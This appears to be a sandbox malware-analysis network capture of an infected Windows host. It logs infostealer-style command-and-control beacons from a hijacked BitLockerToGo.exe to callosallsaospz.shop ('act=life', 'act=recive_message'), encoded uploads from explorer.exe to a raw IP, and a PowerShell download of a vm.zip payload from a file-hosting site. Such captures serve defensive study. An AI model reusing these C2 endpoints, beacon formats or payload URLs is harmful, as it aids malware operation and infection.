2024-07-27 05:44:23 UTC	1122	OUT	Data Raw: 65 6d 39 41 58 31 6e 6e 68 39 50 52 6c 67 44 31 2f 50 66 74 65 2f 6f 2f 6f 54 4c 4b 7a 4e 52 7a 52 5a 43 34 64 43 37 35 52 56 39 53 62 6f 38 6f 31 32 50 63 6a 63 78 70 52 58 61 49 50 79 47 72 32 41 70 41 64 55 43 6f 56 6d 36 4e 45 52 74 37 48 77 79 44 34 4d 41 51 70 68 51 52 44 79 39 65 79 50 4d 76 69 44 76 46 33 31 43 2f 47 35 35 63 5a 44 47 56 34 46 39 44 62 75 73 73 4a 30 42 6d 39 32 69 52 57 78 48 74 6d 74 75 52 63 42 30 42 39 53 39 2f 33 47 53 33 47 7a 76 74 35 50 72 4a 68 31 50 6e 30 30 57 69 53 62 73 51 51 5a 65 78 50 33 33 6b 65 44 4e 4c 68 57 64 64 6a 72 2b 58 74 5a 61 6a 66 54 6c 64 6e 6a 4a 59 2b 72 34 79 77 49 68 34 36 61 75 71 59 6f 64 4c 79 6a 44 45 2b 68 46 56 6d 43 56 30 34 42 44 30 62 5a 43 36 6b 30 4f 55 75 4e 44 61 34 63 70 59 55 45 6d Data Ascii: em9AX1nnh9PRlgD1/Pfte/o/oTLKzNRzRZC4dC75RV9Sbo8o12PcjcxpRXaIPyGr2ApAdUCoVm6NERt7HwyD4MAQphQRDy9eyPMviDvF31C/G55cZDGV4F9DbussJ0Bm92iRWxHtmtuRcB0B9S9/3GS3Gzvt5PrJh1Pn00WiSbsQQZexP33keDNLhWddjr+XtZajfTldnjJY+r4ywIh46auqYodLyjDE+hFVmCV04BD0bZC6k0OUuNDa4cpYUEm
2024-07-27 05:44:24 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:44:24 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:44:24 UTC	685	IN	Data Raw: 47 6d 52 6f 31 45 64 72 6c 77 48 58 4e 69 34 35 30 59 77 62 4b 43 74 48 38 71 47 50 65 4d 6f 35 52 64 56 63 4c 66 78 6c 4d 45 6b 64 50 4a 78 64 6c 62 4b 53 4b 39 45 41 64 2b 4a 4e 41 37 38 47 45 66 35 64 4f 5a 5a 70 30 41 72 2f 76 49 6a 68 4b 32 4a 44 44 79 78 71 51 2b 77 43 4a 79 66 50 4e 45 58 33 49 42 34 6b 39 39 76 7a 39 42 34 41 37 69 59 63 39 51 4b 51 50 2f 4e 72 45 4c 75 67 68 42 68 51 42 70 7a 4b 76 4f 51 52 31 44 73 33 47 37 4a 70 4f 41 48 48 5a 7a 45 5a 46 36 46 55 77 52 6e 72 39 43 42 78 69 50 53 66 31 32 78 54 59 64 4f 74 63 66 2b 46 78 74 42 74 6f 51 4e 4d 48 66 62 78 66 50 4e 77 53 74 50 7a 6f 61 72 73 69 62 61 31 56 63 72 44 52 73 36 74 46 58 50 6b 49 79 32 79 2b 37 33 67 76 4b 2f 59 4c 56 57 43 54 43 48 4c 70 48 7a 31 58 66 75 6a 30 64 4f Data Ascii: GmRo1EdrlwHXNi450YwbKCtH8qGPeMo5RdVcLfxlMEkdPJxdlbKSK9EAd+JNA78GEf5dOZZp0Ar/vIjhK2JDDyxqQ+wCJyfPNEX3IB4k99vz9B4A7iYc9QKQP/NrELughBhQBpzKvOQR1Ds3G7JpOAHHZzEZF6FUwRnr9CBxiPSf12xTYdOtcf+FxtBtoQNMHfbxfPNwStPzoarsiba1VcrDRs6tFXPkIy2y+73gvK/YLVWCTCHLpHz1Xfuj0dO

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	62277	188.114.97.3	443	1988	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:25 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: callosallsaospz.shop
2024-07-27 05:44:25 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-07-27 05:44:25 UTC	816	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 05:44:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=t68mk532efho73fcj853itukls; expires=Tue, 19-Nov-2024 23:31:04 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=inW1r29rNAThQX1vXCPZNwN%2FO2RT%2Fk59LLW3mXJsxfO4xuY%2BiJh7BGhmMx8WaM5erbLRwYXxj2SCDGcNQulcjpNTLNGaeY%2Bf6DBcpup0C%2BV%2FnGpxBgsV%2BPfCS0XcbxEltETlVBPa3g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9a5146a92a4289-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 05:44:25 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-07-27 05:44:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	62278	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:25 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1263
2024-07-27 05:44:25 UTC	1263	OUT	Data Raw: 52 65 64 52 49 6e 30 48 48 33 30 38 36 30 72 76 58 52 4c 2f 45 64 6d 77 52 57 61 78 79 4e 43 69 74 45 6f 73 33 41 35 6d 44 35 58 34 6c 4d 79 42 6f 71 52 50 36 5a 50 47 75 47 72 55 2f 75 2b 6c 59 69 62 67 42 58 53 79 67 4c 6e 58 61 69 6c 49 46 61 69 65 39 42 61 63 74 72 73 64 37 46 37 50 33 48 54 6e 62 2b 4f 49 4c 74 48 56 75 33 55 76 4f 6e 32 59 76 48 44 67 44 66 63 43 4e 2f 4e 33 6b 77 4a 6b 62 64 61 39 6e 76 55 6f 76 4d 55 46 79 6c 58 6c 6c 31 62 59 76 2f 69 72 68 48 64 4a 31 55 32 39 62 42 67 6d 35 76 42 43 47 7a 64 70 32 34 6a 52 62 78 54 79 32 47 38 6e 48 6c 49 44 4c 31 2b 75 2f 42 63 31 64 54 58 79 30 78 36 6f 57 49 72 7a 34 4a 46 46 42 47 67 48 74 35 41 39 4d 32 70 76 75 76 59 33 4d 30 69 35 4f 4f 49 77 57 6a 71 6c 4c 57 77 42 30 79 45 69 6b 65 68 Data Ascii: RedRIn0HH30860rvXRL/EdmwRWaxyNCitEos3A5mD5X4lMyBoqRP6ZPGuGrU/u+lYibgBXSygLnXailIFaie9Bactrsd7F7P3HTnb+OILtHVu3UvOn2YvHDgDfcCN/N3kwJkbda9nvUovMUFylXll1bYv/irhHdJ1U29bBgm5vBCGzdp24jRbxTy2G8nHlIDL1+u/Bc1dTXy0x6oWIrz4JFFBGgHt5A9M2pvuvY3M0i5OOIwWjqlLWwB0yEikeh
2024-07-27 05:44:26 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:44:26 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:44:26 UTC	685	IN	Data Raw: 53 43 6e 67 4b 71 69 52 55 6e 6c 32 6f 66 6f 70 41 48 6f 2f 6f 2b 65 61 47 51 76 55 6f 49 33 5a 33 76 4c 33 48 33 4d 64 30 2b 68 62 4a 6b 69 54 6e 35 52 38 4b 55 30 48 31 52 52 36 4b 4f 54 67 50 67 4d 5a 46 4a 69 53 37 34 46 70 63 2b 36 64 71 35 4a 38 79 59 64 66 7a 5a 54 69 62 74 2b 43 53 44 7a 4c 62 72 34 78 48 54 43 63 36 61 71 47 34 6a 33 62 4c 79 6a 50 4f 5a 66 44 62 6f 39 68 75 2f 4b 30 55 61 4e 6b 6d 64 46 79 49 62 62 51 53 4c 36 39 62 42 67 32 35 4a 77 52 30 65 2b 38 39 4e 61 61 55 65 70 4c 41 30 6b 31 68 56 37 52 77 55 4a 2b 36 63 59 6a 7a 44 51 4f 67 47 49 4c 46 31 66 4e 33 49 68 78 61 38 49 62 41 57 50 41 43 45 78 79 65 36 75 62 63 42 69 6e 65 67 53 61 55 31 35 6d 34 38 71 37 53 4c 4f 6e 7a 48 4f 6c 33 35 44 42 6b 36 74 4e 74 34 57 72 4f 64 44 Data Ascii: SCngKqiRUnl2ofopAHo/o+eaGQvUoI3Z3vL3H3Md0+hbJkiTn5R8KU0H1RR6KOTgPgMZFJiS74Fpc+6dq5J8yYdfzZTibt+CSDzLbr4xHTCc6aqG4j3bLyjPOZfDbo9hu/K0UaNkmdFyIbbQSL69bBg25JwR0e+89NaaUepLA0k1hV7RwUJ+6cYjzDQOgGILF1fN3Ihxa8IbAWPACExye6ubcBinegSaU15m48q7SLOnzHOl35DBk6tNt4WrOdD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	62280	188.114.97.3	443	1988	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:26 UTC	268	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 42 Host: callosallsaospz.shop
2024-07-27 05:44:26 UTC	42	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 62 4f 4b 48 4e 4d 2d 2d 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=bOKHNM--&j=
2024-07-27 05:44:26 UTC	806	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 05:44:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3qvq7v05ni4n4gt3ocr2ballg8; expires=Tue, 19-Nov-2024 23:31:05 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vEb%2BOzq0WmhtDn0a0XPVnrltU9mv6NVqcarqJGVlQ8H484DAiU9nQUfSqAbjxzzqbq6kDfTB5nWcEGeY9njM4n0Yb7finDREFRF57tOsMt77%2F3FgXDbU5xbxbF8LHboRjzu4NAnVLQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9a514d6d24195d-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 05:44:26 UTC	563	IN	Data Raw: 63 63 36 0d 0a 71 5a 6f 77 53 4b 75 62 70 6a 73 57 47 43 4a 39 64 65 44 54 35 45 34 63 63 74 66 53 44 42 30 61 33 34 57 69 66 38 33 62 6c 71 48 53 75 45 5a 71 6b 61 2b 4b 47 57 56 39 41 45 63 42 6b 71 61 42 59 6a 34 54 73 2f 41 32 65 33 75 7a 39 73 64 54 37 36 33 37 67 35 50 38 55 53 54 59 2f 6f 6f 5a 63 32 41 41 52 79 36 62 38 59 45 67 50 6b 6a 31 74 32 5a 2f 65 37 50 6e 77 78 53 69 71 2f 72 43 77 66 5a 58 49 4d 37 34 77 6c 70 36 64 55 63 59 45 49 47 35 69 69 64 78 47 72 72 77 49 44 39 2f 70 61 65 59 58 59 43 2b 34 73 44 6b 2b 30 4d 6a 69 65 61 4b 51 44 52 39 54 46 39 50 77 72 4b 42 4c 48 41 55 73 37 6c 6b 64 58 4b 37 35 73 59 56 76 62 4c 77 79 63 48 34 56 43 48 45 38 64 5a 58 63 48 4a 4d 48 68 71 42 38 63 68 73 65 51 6a 31 36 43 34 73 53 72 37 32 30 51 Data Ascii: cc6qZowSKubpjsWGCJ9deDT5E4cctfSDB0a34Wif83blqHSuEZqka+KGWV9AEcBkqaBYj4Ts/A2e3uz9sdT7637g5P8USTY/ooZc2AARy6b8YEgPkj1t2Z/e7PnwxSiq/rCwfZXIM74wlp6dUcYEIG5iidxGrrwID9/paeYXYC+4sDk+0MjieaKQDR9TF9PwrKBLHAUs7lkdXK75sYVvbLwycH4VCHE8dZXcHJMHhqB8chseQj16C4sSr720Q
2024-07-27 05:44:26 UTC	1369	IN	Data Raw: 63 70 78 2f 66 44 54 7a 52 6c 44 67 5a 58 68 62 33 47 64 44 34 65 73 4c 39 38 66 6d 71 34 36 64 49 52 71 72 2f 35 77 4d 58 34 56 79 33 45 39 38 4a 65 64 33 4a 45 48 68 6d 4f 75 34 55 6f 66 56 44 37 38 47 6c 6e 4f 4f 57 6e 38 52 36 72 76 75 62 41 78 62 68 4e 5a 4e 43 35 77 31 55 30 49 67 41 56 45 59 2b 34 6a 53 74 32 48 4b 65 37 59 58 78 78 75 75 48 4b 48 71 65 7a 38 73 33 4b 2f 31 63 74 32 2f 66 50 56 48 64 77 52 6c 39 5a 77 72 61 65 62 43 5a 51 6d 37 4e 2f 61 55 71 2b 39 74 46 64 73 50 66 74 67 38 7a 30 45 6e 4b 4a 38 4d 78 57 65 58 64 4b 45 52 4b 50 75 49 63 74 63 78 61 2b 73 57 5a 33 66 4c 72 6e 78 42 43 67 74 2f 54 4e 77 2f 31 57 49 4d 43 35 69 68 6c 7a 59 67 42 48 56 37 4b 38 69 69 64 79 55 6f 43 7a 59 48 46 2f 71 36 66 66 55 37 62 35 38 38 2b 4c 6f Data Ascii: cpx/fDTzRlDgZXhb3GdD4esL98fmq46dIRqr/5wMX4Vy3E98Jed3JEHhmOu4UofVD78GlnOOWn8R6rvubAxbhNZNC5w1U0IgAVEY+4jSt2HKe7YXxxuuHKHqez8s3K/1ct2/fPVHdwRl9ZwraebCZQm7N/aUq+9tFdsPftg8z0EnKJ8MxWeXdKERKPuIctcxa+sWZ3fLrnxBCgt/TNw/1WIMC5ihlzYgBHV7K8iidyUoCzYHF/q6ffU7b588+Lo
2024-07-27 05:44:26 UTC	1345	IN	Data Raw: 7a 79 56 31 7a 65 77 42 52 56 34 57 70 78 6e 51 2b 4a 71 57 39 59 6c 46 7a 73 65 36 41 41 75 47 67 74 4d 54 48 75 41 70 71 7a 66 58 4d 55 33 74 7a 53 68 55 59 69 37 47 4f 4a 58 63 54 74 62 78 6f 66 6e 53 78 36 73 55 65 71 72 54 78 77 38 66 2f 56 53 75 4a 74 34 52 65 62 44 6f 59 58 79 65 50 76 59 30 67 50 43 57 32 76 6d 42 34 62 76 33 34 6a 67 54 76 76 76 69 44 6b 37 68 64 4b 38 54 7a 7a 31 64 34 65 30 41 62 46 49 69 78 69 53 6c 34 47 4c 79 77 66 48 68 33 76 4f 62 4c 46 71 4b 33 38 63 4c 4f 2f 78 4a 6b 69 66 37 63 47 53 77 36 62 54 59 74 77 71 37 49 4e 54 34 58 75 66 41 32 50 33 79 33 35 38 30 58 70 4c 62 33 78 4d 58 34 58 79 44 62 38 63 52 5a 65 6e 78 42 45 78 4b 44 76 59 55 2b 63 68 61 34 74 6d 5a 74 4f 50 4f 6e 78 77 58 76 34 62 54 6a 77 50 52 52 4a 73 Data Ascii: zyV1zewBRV4WpxnQ+JqW9YlFzse6AAuGgtMTHuApqzfXMU3tzShUYi7GOJXcTtbxofnSx6sUeqrTxw8f/VSuJt4RebDoYXyePvY0gPCW2vmB4bv34jgTvvviDk7hdK8Tzz1d4e0AbFIixiSl4GLywfHh3vObLFqK38cLO/xJkif7cGSw6bTYtwq7INT4XufA2P3y3580XpLb3xMX4XyDb8cRZenxBExKDvYU+cha4tmZtOPOnxwXv4bTjwPRRJs
2024-07-27 05:44:26 UTC	1369	IN	Data Raw: 33 35 35 61 0d 0a 77 75 4a 7a 69 38 39 63 6f 58 6f 62 7a 37 78 73 6a 33 56 53 66 50 39 63 35 51 66 48 78 50 46 67 57 42 76 59 67 72 63 42 79 37 76 57 52 38 64 66 32 70 67 42 71 33 2b 61 79 44 35 2f 39 66 42 4d 4c 31 77 78 6c 72 4e 46 6c 66 45 49 37 78 33 6d 78 79 47 72 6d 35 62 6e 5a 39 74 65 7a 4a 47 4b 36 79 38 63 44 4e 39 56 30 6a 32 2f 50 48 56 33 64 32 54 42 6b 57 67 61 4f 4f 4a 54 35 65 39 62 64 32 50 79 44 39 78 73 34 51 75 37 37 6b 67 39 53 32 53 32 72 4f 39 59 51 42 4e 48 6c 42 45 42 53 44 76 49 41 6c 64 68 43 7a 74 57 46 79 64 72 72 67 77 42 43 68 74 76 4c 4c 78 76 52 5a 4a 4d 44 2f 78 46 68 2b 4f 67 35 66 45 4a 72 78 33 6d 78 4f 45 37 57 77 64 54 39 6e 38 2f 36 41 47 71 50 35 72 49 50 5a 38 6c 73 71 79 76 62 44 58 58 39 32 52 52 6f 59 67 62 69 Data Ascii: 355awuJzi89coXobz7xsj3VSfP9c5QfHxPFgWBvYgrcBy7vWR8df2pgBq3+ayD5/9fBML1wxlrNFlfEI7x3mxyGrm5bnZ9tezJGK6y8cDN9V0j2/PHV3d2TBkWgaOOJT5e9bd2PyD9xs4Qu77kg9S2S2rO9YQBNHlBEBSDvIAldhCztWFydrrgwBChtvLLxvRZJMD/xFh+Og5fEJrx3mxOE7WwdT9n8/6AGqP5rIPZ8lsqyvbDXX92RRoYgbi
2024-07-27 05:44:26 UTC	1369	IN	Data Raw: 66 57 33 59 6a 38 67 2f 65 62 4d 45 71 79 32 39 38 44 4b 38 6b 41 34 78 66 44 4d 58 48 68 78 54 68 6b 46 68 4c 36 50 4c 33 30 5a 73 72 68 69 64 58 75 36 70 34 35 64 71 4b 47 30 6d 34 76 62 52 54 72 45 75 64 73 58 62 54 70 48 45 31 66 61 38 59 34 68 64 68 71 78 74 32 4e 34 66 72 54 31 79 52 69 68 75 66 44 49 78 50 35 57 4b 63 6e 72 77 6c 31 38 65 55 30 53 47 59 47 31 78 6d 49 2b 46 36 33 77 4e 6a 39 4b 73 4f 6e 62 45 71 69 6f 2f 6f 50 55 74 6b 74 71 7a 76 57 45 41 54 52 2b 54 67 30 63 67 37 71 4e 49 6e 6b 66 73 4c 70 75 63 48 79 2b 36 63 73 63 72 4c 48 35 7a 73 58 79 57 79 50 4f 39 63 42 65 4e 44 51 41 47 41 2f 43 36 63 59 48 58 7a 32 5a 74 33 51 2f 5a 2f 50 2b 67 42 71 6a 2b 61 79 44 78 2f 46 65 49 4d 4c 2b 7a 6c 64 39 64 45 73 4e 42 59 47 31 68 53 56 39 Data Ascii: fW3Yj8g/ebMEqy298DK8kA4xfDMXHhxThkFhL6PL30ZsrhidXu6p45dqKG0m4vbRTrEudsXbTpHE1fa8Y4hdhqxt2N4frT1yRihufDIxP5WKcnrwl18eU0SGYG1xmI+F63wNj9KsOnbEqio/oPUtktqzvWEATR+Tg0cg7qNInkfsLpucHy+6cscrLH5zsXyWyPO9cBeNDQAGA/C6cYHXz2Zt3Q/Z/P+gBqj+ayDx/FeIML+zld9dEsNBYG1hSV9
2024-07-27 05:44:26 UTC	1369	IN	Data Raw: 4e 7a 66 35 54 67 32 31 32 77 39 2b 32 44 7a 50 51 53 63 6f 6e 34 7a 31 4e 37 64 30 4d 5a 46 49 6d 30 6a 43 31 35 47 4c 69 69 62 58 42 33 75 65 66 50 47 36 6d 34 2b 38 58 4d 38 56 4d 69 7a 72 6d 4b 47 58 4e 69 41 45 64 58 72 4c 61 46 4b 44 34 50 2b 36 6b 75 65 48 54 39 76 34 41 64 70 62 50 2b 7a 63 76 2f 51 43 7a 41 2b 63 64 4c 64 33 78 49 47 52 75 4f 76 49 34 6c 66 68 57 2b 76 57 56 79 66 72 33 73 77 56 33 68 2b 66 50 62 69 36 41 53 47 38 54 33 77 46 64 33 61 6b 64 66 43 4d 79 6f 78 69 74 79 55 4f 33 77 59 58 5a 71 75 75 4c 49 46 4b 2b 33 2f 63 72 4d 2f 46 45 72 7a 66 58 4c 55 48 64 79 51 52 63 59 67 62 47 4e 4a 48 51 52 75 37 55 75 4d 54 69 36 2f 34 42 46 37 35 62 33 78 73 44 35 45 41 33 50 2f 73 67 5a 61 7a 52 5a 58 78 43 4f 38 64 35 73 66 52 53 37 75 Data Ascii: Nzf5Tg212w9+2DzPQScon4z1N7d0MZFIm0jC15GLiibXB3uefPG6m4+8XM8VMizrmKGXNiAEdXrLaFKD4P+6kueHT9v4AdpbP+zcv/QCzA+cdLd3xIGRuOvI4lfhW+vWVyfr3swV3h+fPbi6ASG8T3wFd3akdfCMyoxityUO3wYXZquuLIFK+3/crM/FErzfXLUHdyQRcYgbGNJHQRu7UuMTi6/4BF75b3xsD5EA3P/sgZazRZXxCO8d5sfRS7u
2024-07-27 05:44:26 UTC	1369	IN	Data Raw: 74 74 64 39 54 74 76 6e 69 67 35 4f 71 48 47 72 62 75 5a 77 5a 4d 33 6c 53 44 52 47 42 70 34 56 72 51 43 36 62 74 32 68 36 66 36 32 6c 37 68 61 37 76 72 53 4e 69 2f 63 53 63 76 43 35 6a 42 6c 4c 4e 41 41 48 56 39 72 78 73 79 39 77 48 72 4b 6d 66 7a 4a 57 75 75 48 46 47 72 2f 37 32 73 6a 66 2f 78 4a 6b 69 66 2b 45 41 53 51 30 41 42 73 47 77 75 6e 57 66 69 56 46 35 75 63 2b 4c 57 66 7a 2f 6f 41 4c 37 2b 47 6d 6a 59 76 71 45 6e 4b 4a 76 73 64 4c 5a 6e 78 44 43 52 54 46 6a 37 67 76 61 42 32 36 75 32 39 42 52 70 50 71 77 52 36 68 2b 38 58 56 78 75 68 52 4c 38 37 48 2b 6c 64 7a 62 6b 63 52 45 59 4c 78 79 47 78 78 55 4f 32 4a 4c 6a 63 34 67 71 6d 41 42 65 2f 68 74 50 62 49 39 6c 77 74 33 2b 69 4a 65 6d 4a 33 54 78 51 57 77 76 2f 47 4b 6a 35 49 35 66 34 75 65 32 Data Ascii: ttd9Ttvnig5OqHGrbuZwZM3lSDRGBp4VrQC6bt2h6f62l7ha7vrSNi/cScvC5jBlLNAAHV9rxsy9wHrKmfzJWuuHFGr/72sjf/xJkif+EASQ0ABsGwunWfiVF5uc+LWfz/oAL7+GmjYvqEnKJvsdLZnxDCRTFj7gvaB26u29BRpPqwR6h+8XVxuhRL87H+ldzbkcREYLxyGxxUO2JLjc4gqmABe/htPbI9lwt3+iJemJ3TxQWwv/GKj5I5f4ue2
2024-07-27 05:44:26 UTC	1369	IN	Data Raw: 49 34 69 33 38 38 4c 64 36 46 38 6d 36 50 72 56 55 30 70 45 56 52 77 5a 6a 4c 61 51 50 54 35 65 39 62 38 75 4a 30 48 39 72 34 41 69 34 66 6e 73 67 35 4f 34 5a 79 6e 48 39 38 4e 50 5a 54 64 6e 45 52 43 44 70 35 59 68 63 6a 47 32 6f 57 51 2f 4e 76 33 68 67 45 58 39 39 37 54 48 32 72 67 4b 65 70 75 69 6b 51 6f 6a 4b 68 49 41 57 5a 76 78 6b 47 77 6d 51 76 76 77 66 44 38 67 2f 61 44 44 44 37 32 2f 39 39 58 49 76 32 77 55 37 4f 37 48 53 58 4a 35 66 69 45 38 6a 72 65 42 4e 6e 6b 57 6b 35 41 75 4d 54 69 79 70 35 67 6b 37 2f 47 30 2f 49 57 34 53 6d 71 52 75 66 46 61 65 6e 52 48 43 51 62 50 6c 4a 45 76 62 68 61 32 38 43 41 2f 66 76 32 2f 6b 46 50 76 76 65 57 44 6b 36 67 41 63 5a 79 71 6b 77 6b 6d 5a 51 34 47 56 35 54 78 33 6e 34 77 55 4b 66 77 4e 6a 38 2f 76 76 58 Data Ascii: I4i388Ld6F8m6PrVU0pEVRwZjLaQPT5e9b8uJ0H9r4Ai4fnsg5O4ZynH98NPZTdnERCDp5YhcjG2oWQ/Nv3hgEX997TH2rgKepuikQojKhIAWZvxkGwmQvvwfD8g/aDDD72/99XIv2wU7O7HSXJ5fiE8jreBNnkWk5AuMTiyp5gk7/G0/IW4SmqRufFaenRHCQbPlJEvbha28CA/fv2/kFPvveWDk6gAcZyqkwkmZQ4GV5Tx3n4wUKfwNj8/vvX
2024-07-27 05:44:26 UTC	1369	IN	Data Raw: 65 4b 44 6b 36 73 63 61 74 75 35 6e 42 6b 7a 64 45 30 65 46 49 79 79 6c 44 35 34 45 36 4f 7a 4b 55 46 47 6d 76 58 4c 48 4f 32 4c 35 4d 6a 66 2b 31 4d 78 69 39 6e 55 56 47 46 72 52 77 38 70 76 49 61 58 4b 32 35 53 6b 37 4e 34 66 44 6a 7a 70 39 68 64 39 2f 6e 54 30 63 44 35 59 44 72 43 37 63 64 59 62 31 70 51 45 67 4b 54 74 70 5a 73 59 56 36 73 38 48 67 2f 49 4f 36 70 67 41 2f 76 34 62 53 45 78 66 56 54 4b 63 66 36 31 6b 74 79 65 56 59 63 55 4c 79 50 73 69 64 71 45 37 75 32 5a 55 46 47 69 76 62 48 44 65 32 66 39 39 58 49 75 42 78 71 30 62 6d 63 47 55 42 78 56 42 77 5a 68 4c 72 47 4d 7a 41 4a 39 61 59 75 4a 79 76 7a 70 39 4a 64 39 2f 6d 7a 7a 63 62 35 55 53 54 4b 36 39 5a 66 64 32 78 44 57 43 6d 38 6e 6f 55 32 61 42 71 34 76 46 42 42 54 36 7a 67 30 46 2b 4a Data Ascii: eKDk6scatu5nBkzdE0eFIyylD54E6OzKUFGmvXLHO2L5Mjf+1Mxi9nUVGFrRw8pvIaXK25Sk7N4fDjzp9hd9/nT0cD5YDrC7cdYb1pQEgKTtpZsYV6s8Hg/IO6pgA/v4bSExfVTKcf61ktyeVYcULyPsidqE7u2ZUFGivbHDe2f99XIuBxq0bmcGUBxVBwZhLrGMzAJ9aYuJyvzp9Jd9/mzzcb5USTK69Zfd2xDWCm8noU2aBq4vFBBT6zg0F+J

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	62279	31.14.70.245	443	1904	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:26 UTC	220	OUT	GET /download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: store4.gofile.io Connection: Keep-Alive
2024-07-27 05:44:26 UTC	577	IN	HTTP/1.1 200 OK Server: nginx/1.27.0 Date: Sat, 27 Jul 2024 05:44:26 GMT Content-Type: application/zip Content-Length: 296998 Connection: close Accept-Ranges: bytes Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range Content-Disposition: attachment; filename*=UTF-8''vm.zip Last-Modified: Sat, 20 Jul 2024 15:35:59 GMT
2024-07-27 05:44:26 UTC	512	IN	Data Raw: 50 4b 03 04 14 00 00 00 08 00 dd 74 ee 58 cf a1 af e2 8a 9e 01 00 ff 9f 01 00 08 00 00 00 64 61 74 61 2e 62 69 6e 00 1e 2c e1 d3 60 9c e8 00 00 00 00 5a b9 e0 9f 01 00 b0 01 30 84 0a 17 00 00 00 02 84 0a 17 00 00 00 e2 f0 81 c7 c8 60 d4 c8 e0 38 d3 0d 6b a8 40 7e 43 42 42 78 45 44 b8 8e c4 f4 26 64 49 c2 fa 90 bd c3 8e 2c 04 65 ca 0c c3 44 33 63 e6 cd 00 1b 15 f2 75 2e 36 08 0d 0d 0d 0d 09 fb e8 2c e7 02 e7 51 1d a5 d6 20 04 61 48 5d 3f 41 9f fb e3 78 8c 57 37 d8 63 1c 04 3b ac 66 fe 55 cd 04 c3 1d cc a6 43 93 5a 4b 8b 57 0a ee dd 76 c6 f0 c4 6f 0b a9 0d b8 52 ab f3 f7 de 75 2d 32 fd d6 ea f7 c9 c6 8c af bf 8a 23 db f4 53 5f 0a f2 0a ef 6d 13 d4 b1 3f 0c f6 df 34 16 d5 4b e0 f1 1b 76 cd 49 6c 55 65 c4 f8 b1 01 f5 86 86 ce fc 44 83 fe 80 f7 d7 52 e7 bf 20 Data Ascii: PKtXdata.bin,`Z0`8k@~CBBxED&dI,eD3cu.6,Q aH]?AxW7c;fUCZKWvoRu-2#S_m?4KvIlUeDR
